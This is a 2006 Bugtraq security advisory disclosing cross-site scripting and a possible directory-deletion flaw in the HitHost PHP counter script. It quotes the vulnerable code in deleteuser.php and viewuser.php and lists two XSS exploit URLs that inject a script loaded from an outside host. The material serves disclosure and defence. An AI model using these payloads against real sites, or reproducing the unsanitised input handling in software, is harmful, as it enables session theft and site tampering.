Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

histhost v1.0.0 xss and possible rmdir

From: retard () 30gigs com
Date: 6 Mar 2006 23:51:09 -0000
——– summary
        software: HitHost
        vendors website: http://daverave.64digits.com/index.php?page=hithost
        versions: <= 1.0.0
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard
        risk level: medium

——– description
        hithost uses $_GET variables in crucial parts of their code causing
        xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded
        to 0777

        in ./admin/deleteuser.php:
15      else
16      {
17      unlink("users/$deleteuser/password.php");
18      unlink("users/$deleteuser/counter.php");
19      rmdir("users/$deleteuser/");
20      echo "The user <b>$deleteuser</b> has been deleted";
21      }
        
        as you see line 19 raises suspision of the possibility of rming 0777 dirs
        i've tried it on on my personal server with no sucess, if someone knows
        of a way let me know.
        
        in ./admin/viewuser.php:
6       $viewuser = $_GET['user'];
7       include("users/$viewuser/counter.php");
8       echo "Username: <b>$viewuser</b><br><br>";
9       echo "Number of counter hits: $hits<br><br>";

        this code is self explanitory, the script does not sanitise the $_GET['user']
        allowing users to easily shove xss into the variable.

——– exploit(s)
        http://example.com/admin/deleteuser.php?user=<script%20src=http://notlegal.ws/xss.js></script>
        http://example.com/admin/viewuser.php?hits=<script%20src=http://notlegal.ws/xss.js></script>

——– credit
        author(s): retard
        email: retard () 30gigs com
Previous By Date Next
Previous By Thread Next

Current thread: